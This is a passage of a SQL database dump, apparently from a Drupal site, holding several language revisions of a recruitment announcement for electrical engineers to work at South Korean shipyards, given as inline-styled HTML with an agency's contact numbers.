style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">&nbsp;</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</div></div>', '', 'full_html'),
('announcement', 0, 10, 127, 'ja', 0, '<div class=\"xdj266r x11i5rnm xat24cr x1mh8g0r x1vvkbs x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><h3 style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Electrical Engineer</h3><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>1)Qualification</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Bachelor\'s degree or higher + 1 year of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Community college degree + 5 years of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>2) Related degree and experience</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Degree: Electronic Engineering, Electrical Power Engineering</div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">&nbsp;</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</div></div>', '', 'full_html'),
('announcement', 0, 10, 129, 'en', 0, '<div class=\"xdj266r x11i5rnm xat24cr x1mh8g0r x1vvkbs x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><h3 style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Electrical Engineer</h3><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>1)Qualification</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Bachelor\'s degree or higher + 1 year of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Community college degree + 5 years of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>2) Related degree and experience</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Degree: Electronic Engineering, Electrical Power Engineering</div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">&nbsp;</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</div></div>', '', 'full_html'),
('announcement', 0, 10, 129, 'ja', 0, '<div class=\"xdj266r x11i5rnm xat24cr x1mh8g0r x1vvkbs x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><h3 style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Electrical Engineer</h3><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>1)Qualification</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Bachelor\'s degree or higher + 1 year of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Community college degree + 5 years of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>2) Related degree and experience</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Degree: Electronic Engineering, Electrical Power Engineering</div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">&nbsp;</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</div></div>', '', 'full_html'),
('announcement', 0, 10, 129, 'ko', 0, '<div class=\"xdj266r x11i5rnm xat24cr x1mh8g0r x1vvkbs x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><h3 style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Electrical Engineer</h3><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>1)Qualification</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Bachelor\'s degree or higher + 1 year of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Community college degree + 5 years of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>2) Related degree and experience</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Degree: Electronic Engineering, Electrical Power Engineering</div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">&nbsp;</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</div></div>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('announcement', 0, 10, 211, 'en', 0, '<div class=\"xdj266r x11i5rnm xat24cr x1mh8g0r x1vvkbs x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><h3 style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Electrical Engineer</h3><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>1)Qualification</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Bachelor\'s degree or higher + 1 year of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Community college degree + 5 years of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>2) Related degree and experience</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Degree: Electronic Engineering, Electrical Power Engineering</div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">&nbsp;</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</div></div>', '', 'full_html'),
('announcement', 0, 10, 211, 'ja', 0, '<div class=\"xdj266r x11i5rnm xat24cr x1mh8g0r x1vvkbs x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><p>韓国の造船所で電気エンジニアのポジションで働きたい経験豊富なエンジニアを緊急で募集しています。<br>電気エンジニア<br>1)資格&nbsp;<br>大学の学士号またはそれ以上の学位 + その分野での1年の経験<br>&nbsp; &nbsp;コミュニティカレッジの学位 + その分野での5年の経験</p><p>2)関連する学位と経験<br>学位: 電子工学、電力工学</p><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">&nbsp;</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</div></div>', '', 'full_html'),
('announcement', 0, 10, 211, 'ko', 0, '<div class=\"xdj266r x11i5rnm xat24cr x1mh8g0r x1vvkbs x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><h3 style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Electrical Engineer</h3><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>1)Qualification</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Bachelor\'s degree or higher + 1 year of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Community college degree + 5 years of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>2) Related degree and experience</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Degree: Electronic Engineering, Electrical Power Engineering</div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">&nbsp;</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</div></div>', '', 'full_html'),
